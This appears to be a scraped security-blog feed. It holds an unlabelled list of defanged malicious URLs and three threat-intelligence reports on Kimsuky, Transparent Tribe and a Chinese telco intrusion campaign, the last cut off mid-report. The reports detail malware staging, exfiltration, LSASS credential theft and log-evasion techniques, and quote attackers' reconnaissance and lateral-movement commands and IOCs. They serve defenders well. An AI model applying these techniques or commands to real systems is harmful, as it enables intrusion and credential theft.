fff1b8681eadf590034f61ddd69ba035c6980e12

URLs

http[://]128.199.228.142/int/publi.php
http[://]128.199.228.142/itest/envd.php
http[://]128.199.228.142/lgimp/envd.php
http[://]128.199.228.142/vcpu/
http[://]128.199.68.249/libex/track01.wma
http[://]128.199.68.249/libex/track02.wma
http[://]157.245.44.246/cliente/IRS.php
http[://]157.245.44.246/fex/basf.msf
http[://]157.245.44.246/fex/coldplay.msf
http[://]176.57.221.92/cdd/
http[://]178.128.174.182/board/alf.cdr
http[://]178.128.174.182/board/bets.cdr
http[://]185.104.114.253/alp/
http[://]193.218.204.207/int/publi.php
http[://]2.59.41.206/fork/Material.psd
http[://]213.226.124.48/dboard/Material.psd
http[://]45.95.234.10/lofi/index.php
http[://]81.200.152.38:9000/arquivos
http[://]85.193.80.19/rpt/bdb.jpeg
http[://]85.193.83.224/dash/support.psd
http[://]85.193.95.154/odc/
http[://]85.217.170.140/may/
http[://]87.249.44.177/partic/Material.ppt
http[://]89.223.68.22/sonic/movie.wma
http[://]92.255.76.181/mag.psd
http[://]92.53.107.216/shv/
http[://]94.156.35.182/jn/
http[://]94.228.121.36/suport/
http[://]ingretationcompatible.sgp1.digitaloceanspaces.com/board.zip
http[://]jackfrostgo.fra1.digitaloceanspaces.com/thems%20(4).cdr
http[://]pexelsfiles.ams3.digitaloceanspaces.com/pexels.ppt
http[://]ryzenbootsector.fra1.digitaloceanspaces.com/ryzen%20(3).zip
http[://]s3.timeweb.com/41907bc4-clarentis/Steam.cpp
http[://]s3.timeweb.com/41907bc4-clarentis/artinos.cpp
http[://]s3.timeweb.com/41907bc4-clarentis/balarius.cpp
http[://]s3.timeweb.com/41907bc4-clouddeabril/Belcar.cpt
http[://]s3.timeweb.com/41907bc4-clouddeabril/almar.cpt
http[://]s3.timeweb.com/41907bc4-maiotronicelevation/asen.ptt
https[://]ams3.digitaloceanspaces.com/bucket2023/andorra.ppt
https[://]ams3.digitaloceanspaces.com/bucket2023/belize.ppt
https[://]ams3.digitaloceanspaces.com/workingprofstatus/anime.cdr
https[://]ams3.digitaloceanspaces.com/workingprofstatus/brigth.cdr
https[://]audaction.fra1.digitaloceanspaces.com/pass/alma32.cdr
https[://]audaction.fra1.digitaloceanspaces.com/pass/alma64.cdr
https[://]audaction.fra1.digitaloceanspaces.com/pass/best32.cdr
https[://]azuredatabrickstrainne.sfo3.digitaloceanspaces.com/Workspace.zip
https[://]believeonline.ams3.digitaloceanspaces.com/acoustic/p0.cdr
https[://]bucket2023.ams3.digitaloceanspaces.com/belize.ppt
https[://]cartezyan.fra1.digitaloceanspaces.com/Player.wav
https[://]cleannertools.fra1.cdn.digitaloceanspaces.com/word.ppt
https[://]digitalsurfareago.ams3.digitaloceanspaces.com/basf.msf
https[://]dssmithcheck.fra1.digitaloceanspaces.com/track01.sql
https[://]dssmithcheck.fra1.digitaloceanspaces.com/track02.sql
https[://]fintecgroup.ams3.digitaloceanspaces.com/louse.msf
https[://]fra1.digitaloceanspaces.com/dssmithcheck/track01.sql
https[://]joiasdofuturo.webcindario.com/hs/config.php
https[://]marthmusicclub.sfo3.digitaloceanspaces.com/alamis.cdr
https[://]marthmusicclub.sfo3.digitaloceanspaces.com/betunios.cdr
https[://]munich.ams3.digitaloceanspaces.com/Minimize.jpeg
https[://]partyprogames.ams3.digitaloceanspaces.com/alf.cdr
https[://]partyprogames.ams3.digitaloceanspaces.com/bets.cdr
https[://]pratoonecooltool.sfo3.digitaloceanspaces.com/inter.ppt
https[://]pratoonecooltool.sfo3.digitaloceanspaces.com/national.ppt
https[://]ryzemamd.ams3.digitaloceanspaces.com/amd.cdr
https[://]s3.timeweb.com/41907bc4-chronocromdocrom/integra/conf.txt
https[://]s3.timeweb.com/41907bc4-secapril/brexit.ppt
https[://]starbuckplaylist.ams3.digitaloceanspaces.com/fiis.cdr
https[://]starbuckplaylist.ams3.digitaloceanspaces.com/vieww.cdr
https[://]superchat.fra1.digitaloceanspaces.com/ATX.cdr
https[://]superchat.fra1.digitaloceanspaces.com/Brave.cdr
https[://]superchat.fra1.digitaloceanspaces.com/DuckDuck.cdr
https[://]superchat.fra1.digitaloceanspaces.com/pse.cdr
https[://]wekkword.ams3.digitaloceanspaces.com/alphabet32.cdr
https[://]wekkword.ams3.digitaloceanspaces.com/boston32.cdr
https[://]wordcupnewsrocket.ams3.digitaloceanspaces.com/INT64.cdr
https[://]wordcupnewsrocket.ams3.digitaloceanspaces.com/rzFMX64.cdr
https[://]wordmusic.ams3.digitaloceanspaces.com/bestmusic.cdr
https[://]www.dropbox.com/s/dl/p2qd53cultjyw6y/Dividas.zip
https[://]www.dropbox.com/s/p2qd53cultjyw6y/Dividas.zip?dl=1

Kimsuky | Ongoing Campaign Using Tailored Reconnaissance Toolkit

23 May 2023 at 11:23

By Aleksandar Milenkoski and Tom Hegel

Executive Summary

  • SentinelLabs has observed an ongoing campaign by Kimsuky, a North Korean APT group, targeting North Korea-focused information services, human rights activists, and DPRK-defector support organizations.
  • The campaign focuses on file reconnaissance and information exfiltration using a variant of the RandomQuery malware, enabling subsequent precision attacks.
  • Kimsuky distributes RandomQuery using Microsoft Compiled HTML Help (CHM) files, their long-running tactic for delivering diverse sets of malware.
  • Kimsuky strategically employs new TLDs and domain names for malicious infrastructure, mimicking standard .com TLDs to deceive unsuspecting targets and network defenders.

Overview

SentinelLabs has been tracking a targeted campaign against information services, as well as organizations supporting human rights activists and defectors in relation to North Korea. The campaign focuses on file reconnaissance, and exfiltrating system and hardware information, laying the groundwork for subsequent precision attacks. Based on the infrastructure used, malware delivery methods, and malware implementation, we assess with high confidence that the campaign has been orchestrated by the Kimsuky threat actor.

Kimsuky is a suspected North Korean advanced persistent threat (APT) group known for targeting organizations and individuals on a global scale. Active since at least 2012, the group regularly engages in targeted phishing and social engineering campaigns to collect intelligence and gain unauthorized access to sensitive information, aligning with the interests of the North Korean government.

Lately, Kimsuky has been consistently distributing custom malware as part of reconnaissance campaigns to enable subsequent attacks. For example, we recently revealed the groupโ€™s distribution of ReconShark through macro-enabled Office documents.

The campaign we discuss in this post indicates a shift towards using a variant of the RandomQuery malware that has the single objective of file enumeration and information exfiltration. This stands in contrast to recently observed RandomQuery variants supporting a wider array of features, such as keylogging and execution of further specialized malware.

RandomQuery is a constant staple in Kimsukyโ€™s arsenal and comes in various flavors. This campaign specifically uses a VBScript-only implementation. The malwareโ€™s ability to exfiltrate valuable information, such as hardware, operating system, and file details, indicates its pivotal role in Kimsukyโ€™s reconnaissance operations for enabling tailored attacks.

This campaign also demonstrates the groupโ€™s consistent approach of delivering malware through CHM files, such as keylogging and clipboard content theft malware. In line with their modus operandi, Kimsuky distributes the RandomQuery variant we observed through this vector.

Finally, this campaign highlights Kimsukyโ€™s recent extensive use of less common top-level domains (TLDs) for their infrastructure, such as .space, .asia, .click, and .online. The group also uses domain names that mimic standard .com TLDs, aiming to appear legitimate.

Initial Targeting

Kimsuky makes use of specially crafted phishing emails to deploy RandomQuery. The phishing emails are sent to targets from an account registered at the South Korean email provider Daum, a standard Kimsuky phishing practice. Recent sender email addresses include bandi00413[@]daum.net.

The phishing emails, written in Korean, request the recipient to review an attached document claiming to be authored by Lee Kwang-baek, the CEO of Daily NK. Daily NK is a prominent South Korean online news outlet that provides independent reporting on North Korea, making them a prime organization for impersonation by DPRK threat actors looking to appear legitimate.

Kimsuky phishing email (in Korean)
Kimsuky phishing email (in Korean)

The attached document is a CHM file stored in a password-protected archive. Aligning with the targeting focus of Kimsuky in this campaign, the lure document is entitled โ€œDifficulties in activities of North Korean human rights organizations and measures to vitalize themโ€ and presents a catalog of challenges pertaining to human rights organizations.

Lure document snippet (in Korean)
Lure document snippet (in Korean)

Consistent with known Kimsuky tactics, the CHM file contains a malicious Shortcut object that activates on the Click event. The object:

  • Creates a Base-64 encoded file in the %USERPROFILE%\Links\ directory, such as mini.dat.
  • Decodes the file using the certutil utility, creating a VB script, and then stores the script in a separate file, such as %USERPROFILE%\Links\mini.vbs.
  • Establishes persistence by editing the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key, such that the newly created VB script is executed at system startup.
Shortcut object
Shortcut object

The VB script issues a HTTP GET request to a C2 server URL, for example, http[://]file.com-port.space/indeed/show[.]php?query=50, and executes the second-stage payload returned from the server. Based on overlaps in code documented in previous work, we assess that the second-stage payload is a VBScript RandomQuery variant.

Execution of a RandomQuery variant
Execution of a RandomQuery variant

Dissecting RandomQuery

The RandomQuery variant that Kimsuky distributes first configures the Internet Explorer browser by editing registry values under HKCU\Software\Microsoft\Internet Explorer\Main:

  • Sets Check_Associations to no: The system does not issue a notification if Internet Explorer is not the default web browser.
  • Sets DisableFirstRunCustomize to 1: Prevents Internet Explorer from running the First Run wizard the first time a user starts the browser.

RandomQuery also sets the registry value HKCU\Software\Microsoft\Edge\IEToEdge\RedirectionMode to 0, which stops Internet Explorer from redirecting to the Microsoft Edge browser.

RandomQuery configures Internet Explorer
RandomQuery configures Internet Explorer

These Internet Explorer configurations enable the uninterrupted use of the browser by RandomQuery, whose earlier variants are known to use the InternetExplorer.Application object when communicating with C2 servers. However, the RandomQuery variant we analyzed does not use this object, but leverages Microsoft.XMLHTTP for this purpose.

RandomQuery then proceeds to gather and exfiltrate information about the infected platform, structured into three classes that the malware refers to as Basic System, Specific Folder, and Process List.

The malware first gathers system and hardware information using the Win32_ComputerSystem, Win32_OperatingSystem, and Win32_Processor WMI classes, such as: computer name, processor speed, OS version, and the amount of physical memory available to the system. RandomQuery refers to this information as Basic System information.

RandomQuery gathers Basic System information
RandomQuery gathers Basic System information

RandomQuery then enumerates subdirectories and files within particular directories by specifying them using ID numbers of the Windows ShellSpecialFolderConstants enumeration: Desktop (ID 0); Documents (ID 5, for example, C:\Users\[username]\Documents); Favorites (ID 6, for example, C:\Documents and Settings\[username]\Favorites); Recent (ID 8, for example, C:\Users\[username]\AppData\Roaming\Microsoft\Windows\Recent); Program Files (ID 38, for example, C:\Program Files); Program Files (x86) (ID 42, for example, C:\Program Files (x86) on 64-bit platforms); and %USERPROFILE%\Downloads (ID 40, for example, C:\Users\[username]\Downloads).

The malware refers to this information as Specific Folder information: It provides the attackers with a wealth of user- and platform-related information, such as installed applications, user document details, and frequented websites.

RandomQuery gathers Specific Folder information
RandomQuery gathers Specific Folder information

RandomQuery also enumerates the process and session IDs of running processes using the Win32_Process WMI class. The malware refers to this information as Process List information.

RandomQuery gathers Process List information
RandomQuery gathers Process List information

To exfiltrate the gathered information, RandomQuery first Base64-encodes it, and then constructs and issues an HTTP POST request containing the information to a C2 server URL (for example, http[://]file.com-port.space/indeed/show[.]php?query=97). We observed that the C2 URLs RandomQuery uses for exfiltration overlap with the URLs from which RandomQuery itself is downloaded, with a difference in the value of the query parameter.

RandomQuery exfiltrates information
RandomQuery exfiltrates information

The variants we analyzed use c2xkanZvaXU4OTA as a boundary string separating header values from the exfiltrated information stored in the POST request. Pivoting on this string enabled us to identify additional RandomQuery variants used by Kimsuky in the past. This is a further indication of the threat group consistently using this malware in its targeted campaigns.

These variants differ to various extents from those we observed in Kimsukyโ€™s latest campaign. This includes features such as enumeration of deployed security products, focus on Microsoft Word documents when enumerating files, and execution of additional malicious code. Kimsuky continuously adapts its RandomQuery arsenal to the task at hand, with the current iteration focussing on information exfiltration and file reconnaissance.

Infrastructure

Kimsuky has made extensive use of less common TLDs during their malicious domain registration process. In our recent reporting on Kimsukyโ€™s ReconShark activity, we noted multiple clusters of malicious domains which made use of the same technique.

This latest campaign is tied to infrastructure abusing the .space, .asia, .click, and .online TLDโ€™s, combined with domain names mimicking standard .com TLDs. Noteworthy examples include com-def[.]asia, com-www[.]click, and com-otp[.]click. Placed into a full URL path, an average user is less likely to spot obvious suspicious links.

Campaign-related domain registration timeline
Campaign-related domain registration timeline

For this latest campaign, the threat actor used the Japan-based domain registration service Onamae for primary malicious domain purchasing. This particular cluster of activity began on May 5th 2023, and continues as of this report. ABLENET VPS Hosting is used by the actor following domain registration.

Conclusion

We continue to closely monitor the persistent attacks carried out by Kimsuky and its continuously advancing attack toolkit. These incidents underscore the ever-changing landscape of North Korean threat groups, whose remit not only encompasses political espionage but also sabotage and financial threats.

It is imperative for organizations to familiarize themselves with the TTPs employed by suspected North Korean state-sponsored APTs and to adopt appropriate measures to safeguard against such attacks. The correlation between recent malicious activities and a broader range of previously undisclosed operations attributed to North Korea emphasizes the importance of maintaining a state of constant alertness and fostering collaborative efforts.

Indicators of Compromise

SHA1 Hashes

96d29a2d554b36d6fb7373ae52765850c17b68df
84398dcd52348eec37738b27af9682a3a1a08492
912f875899dd989fbfd64b515060f271546ef94c
49c70c292a634e822300c57305698b56c6275b1c
8f2e6719ce0f29c2c6dbabe5a7bda5906a99481c
0288140be88bc3156b692db2516e38f1f2e3f494

Domains

com-port[.]space
com-pow[.]click
com-def[.]asia
com-www[.]click
com-otp[.]click
com-price[.]space
de-file[.]online
com-people[.]click
kr-angry[.]click
kr-me[.]click
cf-health[.]click
com-hwp[.]space
com-view[.]online
com-in[.]asia
ko-asia[.]click
db-online[.]space

Transparent Tribe (APT36) | Pakistan-Aligned Threat Actor Expands Interest in Indian Education Sector

13 April 2023 at 09:55

Executive Summary

  • SentinelLabs has been tracking a cluster of malicious documents that stage Crimson RAT, distributed by APT36 (Transparent Tribe).
  • We assess that this activity is part of the groupโ€™s previously reported targeting of the education sector in the Indian subcontinent.
  • We observed APT36 introducing OLE embedding to its typically used techniques for staging malware from lure documents and versioned changes to the implementation of Crimson RAT, indicating the ongoing evolution of APT36โ€™s tactics and malware arsenal.

Overview

SentinelLabs has been tracking a recently disclosed cluster of malicious Office documents that distribute Crimson RAT, used by the APT36 group (also known as Transparent Tribe) targeting the education sector. This post summarizes our observations highlighting the groupโ€™s continuous change in used malware staging techniques and Crimson RAT implementations.

Transparent Tribe is a suspected Pakistan-based threat group active since at least 2013. The group is not very sophisticated; however, it is a highly persistent threat actor that continuously adapts its operational strategy. Transparent Tribe has previously focused mainly on Indian military and government personnel, but it has recently expanded its scope to include educational institutions and students in the Indian subcontinent. Crimson RAT is a consistent staple in the groupโ€™s malware arsenal the adversary uses in its campaigns.

The names and content of the lure documents, the associated domains, and the use of Crimson RAT suggest that the activities discussed in this post are part of a previously reported broader targeting of the education sector by Transparent Tribe.

Further, the PDB paths of some Crimson RAT samples we analyzed contain the word Wibemax, which is also contained in the PDB paths of Crimson RAT payloads observed in a previous Transparent Tribe campaign.

Wibemax matches the name of a Pakistani software development company, but at this time we have not identified a clear relationship to the adversary.

It is worth noting that there are high confidence assessments of Transparent Tribe leveraging third parties to support their operation, such as the Pakistani web hosting provider Zain Hosting.

Our analysis reinforces the assessment that closely monitoring the research endeavors of adversary nations has become an important objective for the adversary, underscoring the crucial role this activity plays in fulfilling the goals and aspirations of the authorities whose interests Transparent Tribe represents.

Malicious Documents

The documents that Transparent Tribe distributes have education-themed content and names such as assignment or Assignment-no-10, and indicate creation dates of July and August 2022. Based on known behavior of this group, we suspect that the documents have been distributed to targets as attachments to phishing emails. Consistent with known Transparent Tribe tactics, we observed that some of the documents have been hosted on file hosting services and attacker-created domains, such as s1.fileditch[.]ch, cloud-drive[.]store, and drive-phone[.]online.

It is important to note that cloud-drive[.]store and drive-phone[.]online have been previously linked to Transparent Tribe activities targeting the education sector and assessed as domains prepared for future use. Further, drive-phone[.]online closely resembles the phone-drive[.]online domain recently observed hosting Transparent Tribe malware targeting Indian and Pakistani Android users.

The malicious documents we analyzed stage Crimson RAT using Microsoft Office macros or OLE embedding.

The macro code executes when the documents are opened, and its functionality is consistent with known Transparent Tribe macro variants. The macros create and decompress an embedded archive file in the %ALLUSERSPROFILE% directory (C:\ProgramData) and execute the Crimson RAT payload within. Some macros insert text in the document, which is typically education-themed content relating to India.

Transparent Tribe APT36 Macro implementation
Macro implementation
Transparent Tribe APT36 Macro-inserted document text
Macro-inserted document text

In addition to macros, we observed that Transparent Tribe have adopted OLE embedding as a technique to stage Crimson RAT. Malicious documents that implement this technique require users to double-click a document element. The documents distributed by Transparent Tribe typically display an image (a โ€œView Documentโ€ graphic) indicating that the document content is locked. This lures users to double-click the graphic to view the content, which activates an OLE package that stores and executes Crimson RAT masquerading as an update process (MicrosoftUpdate.exe).

Transparent Tribe APT36 The โ€œView Documentโ€ graphic
The โ€œView Documentโ€ graphic
Transparent Tribe APT36 OLE stream that stores Crimson RAT
OLE stream that stores Crimson RAT

Transparent Tribe is known to experiment with different malware staging techniques, which include distributing executables with embedded documents or documents that execute designated Crimson RAT loaders. The adoption of OLE embedding further highlights the groupโ€™s continuous experimentation with malware staging techniques.

Crimson RAT Implementations

We observed a variety of Crimson RAT .NET implementations, with compilation timestamps between July and September 2022. The Crimson RAT payloads we analyzed use the richa-sharma.ddns[.]net domain for C2 purposes and support either 40 or 65 commands, most of which have been documented in previous research. Features of Crimson RAT include exfiltrating system information, capturing screenshots, starting and stopping processes, and enumerating files and drives.

Transparent Tribe APT36 A Crimson RAT command dispatch routine
A Crimson RAT command dispatch routine

Some Crimson RAT variants are stripped of debug information, whereas others have PDB paths that contain a date stamp, the word Richa, which relates to the configured C2 domain, and the word Wibemax. Portions of these PDB paths overlap those of Crimson RAT payloads observed in a previous Transparent Tribe campaign, such as D:\Projects\Wibemax\WinP\WinP\obj\Debug\WinP.pdb and D:\Projects\Wibemax\Windows RAT\1 Windows 10 Client\Win8P-Sunny\2022-04-15-Win8P Sunny\obj\Debug\FUJIKBattery.pdb.

Transparent Tribe APT36 Crimson RAT PDB paths
Crimson RAT PDB paths

We observed different Crimson RAT version identifiers: R.S.8.8., R.S.8.9, R.S.8.1, and R.S.8.6. We speculate that the R.S. components of the identifiers may relate to the configured C2 domain (richa-sharma.ddns[.]net) and the numerical components may specify a version (build) number. This aligns with a documented Crimson RAT variant with the identifier S.L.2.2., which has used the sunnyleone.hopto[.]org domain for C2 purposes.

As an anti-analysis measure, Crimson RAT variants delay their execution for a given time period, for example, 61, 180, or 241 seconds. Most of the Crimson RAT variants we analyzed evaluate whether they execute at a machine named G551JW or DESKTOP-B83U7C5 and establish persistence by creating a registry key under \SOFTWARE\Microsoft\Windows\CurrentVersion\Run only if the victimโ€™s machine name differs. G551JW or DESKTOP-B83U7C5 may be the names of the machines where Crimson RAT developers have been running test executions.

Crimson RAT variants implement different obfuscation techniques of varying intensities, for example, simple function name malformation and dynamic string resolution. We observed the use of the Eazfuscator obfuscator in a Crimson RAT sample named NewOrleans. Evidence suggests that the Crimson RAT developers have patched the routine that evaluates the trial period of Eazfuscator to enable the execution of the malware after the trial period expires.

Transparent Tribe APT36 Eazfuscator trial period evaluation in NewOrleans
Eazfuscator trial period evaluation in NewOrleans
Transparent Tribe APT36 Eazfuscator trial expiry message
Eazfuscator trial expiry message

With previous variants of Crimson RAT obfuscated using Crypto Obfuscator, the addition of Eazfuscator to the obfuscation techniques used by Transparent Tribe highlights the continuous maintenance and development of the RAT.

Conclusion

Transparent Tribe is a highly motivated and persistent threat actor that regularly updates its malware arsenal, operational playbook, and targets. Our analysis further demonstrates this characteristic of the group by spotlighting the adoption of OLE embedding as a technique for staging malware from lure documents and the Eazfuscator obfuscator to protect Crimson RAT implementations. Transparent Tribeโ€™s constantly changing operational and targeting strategies require constant vigilance to mitigate the threat posed by the group.

Indicators of Compromise

SHA1 Description
738d31ceca78ffd053403d3b2bc15847682899a0 Malicious document
9ed39c6a3faab057e6c962f0b2aaab07728c5555 Malicious document
af6608755e2708335dc80961a9e634f870aecf3c Malicious document
e000596ad65b2427d7af3313e5748c2e7f37fba7 Malicious document
fd46411b315beb36926877e4b021721fcd111d7a Malicious document
516db7998e3bf46858352697c1f103ef456f2e8e Crimson RAT
842f55579db786e46b20f7a7053861170e1c0c5e Crimson RAT
87e0ea08713a746d53bef7fb04632bfcd6717fa9 Crimson RAT
911226d78918b303df5110704a8c8bb599bcd403 Crimson RAT
973cb3afc7eb47801ff5d2487d2734ada6b4056f Crimson RAT
Domain Description
richa-sharma.ddns[.]net C2 server
cloud-drive[.]store Malware hosting location
drive-phone[.]online Malware hosting location
s1.fileditch[.]ch Malware hosting location

Operation Tainted Love | Chinese APTs Target Telcos in New Attacks

23 March 2023 at 09:53

By Aleksandar Milenkoski, Juan Andres Guerrero-Saade, and Joey Chen, in collaboration with QGroup

Executive Summary

  • In Q1 of 2023, SentinelLabs observed initial phases of attacks against telecommunication providers in the Middle East.
  • We assess that this activity represents an evolution of tooling associated with Operation Soft Cell.
  • While it is highly likely that the threat actor is a Chinese cyberespionage group in the nexus of Gallium and APT41, the exact grouping remains unclear.
  • SentinelLabs observed the use of a well-maintained, versioned credential theft capability and a new dropper mechanism indicative of an ongoing development effort by a highly-motivated threat actor with specific tasking requirements.

Overview

In collaboration with QGroup GmbH, SentinelLabs recently observed initial threat activities targeting the telecommunication sector. We assess it is highly likely that these attacks were conducted by a Chinese cyberespionage actor related to the Operation Soft Cell campaign.

The initial attack phase involves infiltrating Internet-facing Microsoft Exchange servers to deploy webshells used for command execution. Once a foothold is established, the attackers conduct a variety of reconnaissance, credential theft, lateral movement, and data exfiltration activities.

The deployment of custom credential theft malware is central to this new campaign. The malware implemented a series of Mimikatz modifications on closed-source tooling. This post details the multi-component architecture and functionality of a sample, referred to as mim221.

We assess that mim221 is a recent version of an actively maintained credential theft capability upgraded with new anti-detection features. The use of special-purpose modules that implement a range of advanced techniques shows the threat actorsโ€™ dedication to advancing its toolset towards maximum stealth. These techniques include

  • in-memory mapping of malicious images to evade EDR API hooks and file-based detections
  • surgically terminating Event Log threads instead of the host process to inhibit logging without raising suspicions
  • staging a credential theft capability in the LSASS process itself by abusing native Windows capabilities.

Version numbers and build timestamps indicate a maintained software project by designated developers. Closer analysis reveals an element of pragmatism in that the threat actors use modified publicly available code to achieve their goals.

In terms of attribution, the tooling suggests an immediate link to the โ€˜Operation Soft Cellโ€™ campaign but remains slightly vague on the specific threat actor. That campaign has been publicly associated with Gallium and possible connections to APT41 have been suggested by the use of a common code signing certificate and tooling that shares code similarities. APT41 is also known to target telecommunication providers.

Given previous target and TTP overlaps, and an evident familiarity with victim environments, we assess with medium-confidence that Gallium is involved. However, we also recognize the possibility of closed-source tool-sharing between Chinese state-sponsored threat actors, and the possibility of a shared vendor or digital quartermaster.

Regardless of clustering specifics, this finding highlights the increased operational tempo of Chinese cyberespionage actors and their consistent investment in advancing their malware arsenal to evade detection.

Infection Vector and Initial TTPs

As initial attack indicators, we observed command execution through webshells on compromised Microsoft Exchange server deployments. The threat actors used C:\MS_DATA as their main working directory for storing malware and staging data for exfiltration. Noting that the Microsoft TroubleShootingScript toolset (TSSv2) uses C:\MS_DATA for storing log files, we suspect that its use as a working directory is an attempt to make malicious file system activities look legitimate.

After establishing an initial foothold, the threat actor conducts reconnaissance like querying user and network information using a variety of tools. For example, the attackers used dsquery and query to obtain information about Active Directory objects, including user information, and Remote Desktop user sessions. They also used the Local Group (LG) tool to enumerate all local groups and members in a domain.

   "cmd"ย  /c cd /d C:\MS_DATA\&dsquery * -limit 0 -filter
   "cmd"ย  /c cd /d C:\MS_DATA\&dsquery * -limit 0 -filter "&(objectClass=User)(objectCategory=Person)" -attr objectSID sAMAccountName displayNameย  mail memberOf >da.back&cd
   "cmd"ย  /c cd /d c:\windows\system32\inetsrv\&query user&cd
   "cmd"ย  /c cd /d C:\MS_DATA\&lg.exe \\[IP ADDRESS] -lu >169.txt&cd

The attackers then check connectivity with both the Internet and specific local machines of interest.

ย ย ย "cmd"ย  /c cd /d c:\windows\system32\inetsrv\&ping 8.8.8.8 -n 1&cd
ย ย ย "cmd"ย  /c cd /d c:\windows\system32\inetsrv\&ping -n 1 [IP ADDRESS/HOSTNAME]&cd

They also retrieve networking information, like network adapters, specific machines, and network services likeย  Remote Desktop Protocol (RDP).

   "cmd"ย  /c cd /d C:\MS_DATA\&ipconfig /all&cd
   "cmd"ย  /c cd /d c:\windows\system32\inetsrv\&net use&cd
   "cmd"ย  /c cd /d c:\windows\system32\inetsrv\&netstat.exe -nob
   "cmd"ย  /c cd /d c:\windows\system32\inetsrv\&netstat -aon |find "3389"&cd
   "cmd"ย  /c cd /d C:\MS_DATA\&netstat -aon |find "[IP ADDRESS]"&cd

The threat actor made use of the native makecab tool to compress information gathered for exfiltration.

   "cmd"ย  /c cd /d C:\MS_DATA\&makecab da.back d.zip >1.txt&cd

For lateral movement, the attackers made use of the PsExec tool and the net use command for accessing shared resources on remote machines.

   "cmd"ย  /c cd /d C:\MS_DATA\&net use \\[IP ADDRESS] [PASSWORD] /u:[DOMAIN]\[USERNAME]

A Penchant for Credential Theft

In order to steal credentials, the attackers employ custom modified versions of Mimikatz, including an executable named pc.exe.

Mimikatz publicly available code (top); strings from a Mimikatz modification (bottom)

The pc.exe executable stages the execution of three other components that ultimately result in stealing credentials from the Local Security Authority Subsystem Service (LSASS) process.

We refer to the four component chain as โ€˜mim221โ€™ based on the version number that the tool displays (2.2.1).

We observed the threat actors deploying individual chunks of pc.exe in the working directory and merging these into pc.exe using the type command.

pc.exe file chunks
pc.exe file chunks

We noticed that the attackers ceased their activities after stealing credentials. This could indicate a multi-phase attack strategy, where the deployment of backdoors and further persistence mechanisms is carried out separately after credential theft has ensured continued access. The intrusions were detected and interrupted before the attackers could carry out further phases, such as deploying backdoors.

mim221

The architecture of mim221 consists of four components: the pc.exe Windows executable, and the AddSecurityPackage64.dll, pc.dll, and getHashFlsa64.dll DLLs contained therein.

mim221 execution overview
mim221 execution overview
mim221 Component Size Compilation timestamp
pc.exe 502 KBs Thu Jun 09 08:02:12 2022 (UTC)
AddSecurityPackage64.dll 119 KB Thu Jun 09 08:01:46 2022 (UTC)
pc.dll 297 KB Tue Jun 07 16:55:05 2022 (UTC)
getHashFlsa64.dll 216 KB Fri May 27 20:56:26 2022 (UTC)

pc.exe

The main binary executed by the threat actor is pc.exe. It decrypts AddSecurityPackage64.dll and pc.dll, stores pc.dll on the file system, and then loads and executes AddSecurityPackage64.dll by invoking its exported function, pathAddPackage.

The execution of pc.exe requires a password supplied by the operator (in this case, P2sSW0rd1234!@#$C), which the operator provides through the key command-line parameter.

pc.exe decrypts AddSecurityPackage64.dll and pc.dll using the AES encryption algorithm, providing the operator-provided execution password as an initialization vector.

pc.exe loads and executes the decrypted AddSecurityPackage64.dllusing reflective image loading. This technique involves first mapping a Windows PE image in memory and then executing the imageโ€™s main entry point or an export function.

Among other activities, the image mapping process includes allocating memory for the image, storing the image headers and sections in the memory, populating the imagesโ€™ import and delay import tables, adding exception handlers, and executing TLS callback and export routines. The Phant0m tool provides a complete implementation of this process.

While reflective image loading is a known technique at this time, its use was first observed in the DoublePulsar and subsequently the SlingShot frameworks in 2017 and 2018, respectively. This technique enables the fully fileless loading and execution of a malicious image without invoking the standard Windows API, such as LoadLibrary. This eliminates detection based on API hooking and file artifacts.

When it is finished executing, pc.exe displays a message indicating a version number and build timestamp: Version 2.2.1ย  - build on Junย  9 2022 16:02:12.

AddSecurityPackage64.dll

AddSecurityPackage64.dll, which is the original filename of this mim221 component, is responsible for:

  • Obtaining the SeDebugPrivilege and SYSTEM privilege by access token impersonation. This allows mim221 to inspect and extract credentials from the LSASS process.
  • Disabling Windows event logging in an attempt to evade detection; and
  • Injecting pc.dll into LSASS as a Security Package. Security Packages are used to extend the Windows authentication mechanism and can be abused to execute malicious code in the context of LSASS.

In an attempt to remain undetected, AddSecurityPackage64.dll disables Windows event logging by killing threads of the Windows Event Log service without stopping the execution of the service itself. This is achieved by locating the process that hosts the Event Log, enumerating the processesโ€™ threads, identifying the threads assigned to the service by their service tag (eventlog), and terminating them.

Querying service tag information
Querying service tag information

AddSecurityPackage64.dll injects pc.dll into LSASS by deploying pc.dll as a Security Package. To this end, AddSecurityPackage64.dll issues an RPC call to LSASS โ€“ to the ncalrpc:[lsasspirpc] RPC endpoint, providing the file path to pc.dll to LSASS. This call instructs LSASS to load and execute pc.dll, which then stages the getHashFlsa64.dll credential theft component.

getHashFlsa64.dll conducts credential theft in the context of LSASS
getHashFlsa64.dll conducts credential theft in the context of LSASS

pc.dll and getHashFlsa64.dll

In the context LSASS, pc.dll decrypts, reflectively loads, and executes the code credential theft component getHashFlsa64.dll in a manner similar to pc.exe. pc.dll and getHashFlsa64.dll share the same original filename: getHashFlsa64.dll.

pc.dll is implemented such that its main routine returns FALSE, making LSASS execute pc.dll and then unload it. This is a detection evasion technique making LSASS load pc.dll while avoiding appearing as an added (registered) Security Package. LSASS normally creates registry entries when adding Security Packages and does not unload them once loaded. This provides an opportunity for defenders to detect the loading of malicious Security Packages. Previous research provides more detail on this topic.

getHashFlsa64.dll accesses the memory of its host LSASS process and stores stolen credentials in a Mimikatz log file named pc.log for later exfiltration.

Example pc.log content
Example pc.log content

getHashFlsa64.dll exports a function named GetMyVersion, which displays a version number and build timestamp (Version 2.2.0ย  - build on May 28 2022 04:56:23), in a format consistent with the output from pc.exe. The credential theft functionality of getHashFlsa64.dll is implemented in its export function GetLogonInfo.

The GetMyVersion function
The GetMyVersion function

Additional Information

Error Messages and Public Code Reuse

The mim221 components implement error logging. The error messages follow a consistent output format.

Example error messages
Example error messages

It is important to note that we observed code segments that seem to be modified versions of publicly available code. For example, the implementation of AddSecurityPackage64.dll looks like an adaptation of public code that demonstrates injection of a Security Package into LSASS using RPC calls.

Similarity between <a href="https://gist.github.com/xpn/c7f6d15bf15750eae3ec349e7ec2380e" target="_blank" rel="noopener noreferrer">publicly</a> available code (top) and AddSecurityPackage64.dll (bottom)
Similarity between publicly available code (top) and AddSecurityPackage64.dll (bottom)

Timestamp Information

